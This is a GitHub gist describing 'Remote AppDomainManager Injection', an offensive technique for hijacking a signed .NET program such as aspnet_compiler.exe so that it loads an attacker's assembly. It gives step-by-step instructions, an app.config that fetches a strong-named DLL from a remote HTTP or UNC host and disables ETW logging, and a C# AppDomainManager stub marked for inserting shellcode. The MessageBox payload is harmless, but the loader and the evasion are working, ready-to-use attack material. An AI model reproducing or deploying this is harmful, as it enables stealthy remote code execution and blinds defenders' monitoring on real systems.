Skip to content

Instantly share code, notes, and snippets.

@0xSV1

0xSV1/README.md

Forked from byt3bl33d3r/README.md
Created September 1, 2020 22:06
Show Gist options
  • Save 0xSV1/9646face72edf26681850bd0d6196049 to your computer and use it in GitHub Desktop.
Save 0xSV1/9646face72edf26681850bd0d6196049 to your computer and use it in GitHub Desktop.
Download ZIP
Remote AppDomainManager Injection
Raw
README.md

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to say, C:\Test. Lets use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name, this is required to load an assembly outside of a .NET applications base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server
  4. Replace the name, version and publicKeyToken values accordingly in the <assemblyIdentity> and <AppDomainManagerAssembly> elements in app.config with the values from your compiled test.dll
  5. Update the URL pointing to test.dll in app.config
  6. Rename app.config to aspnet_compiler.exe.config and put it in the same folder as the copied aspnet_compiler.exe
  7. Execute aspnet_compiler.exe
  8. Profit :)

Notes

This isn't completely "fileless" as the downloaded AppDomainManager assembly gets written to disk at ~\AppData\Local\assembly\dl3 along with a .ini file which has the URL it came from, but it does provide more flexibility.

References

https://docs.microsoft.com/en-us/dotnet/framework/configure-apps/file-schema/runtime/etwenable-element https://docs.microsoft.com/en-us/dotnet/framework/configure-apps/file-schema/runtime/codebase-element

Raw
app.config
<!--
Replace the name, version and publicKeyToken values accordingly in the assemblyIdentity and the AppDomainManagerAssembly elements.
Obviously, replace the URL pointing to your test.dll
-->
<configuration>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="test"
publicKeyToken="bc139fb1d811ee28"
culture="neutral" />
<codeBase version="1.0.0.0"
href="http://192.168.76.1:8000/test.dll"/>
<!--
Works with UNC paths too :)
href="file://192.168.76.1\tmp\test.dll" />
-->
</dependentAssembly>
</assemblyBinding>
<etwEnable enabled="false" /> <!-- Disables ETW :) -->
<appDomainManagerAssembly value="test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=bc139fb1d811ee28" />
<appDomainManagerType value="MyAppDomainManager" />
</runtime>
</configuration>
Raw
test.cs
using System;
using System.Windows.Forms;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
bool res = ClassExample.Execute();
return;
}
}
public class ClassExample
{
public static bool Execute()
{
//Insert your 1337 shellcode injection code here :)
MessageBox.Show("KaBoom!");
return true;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment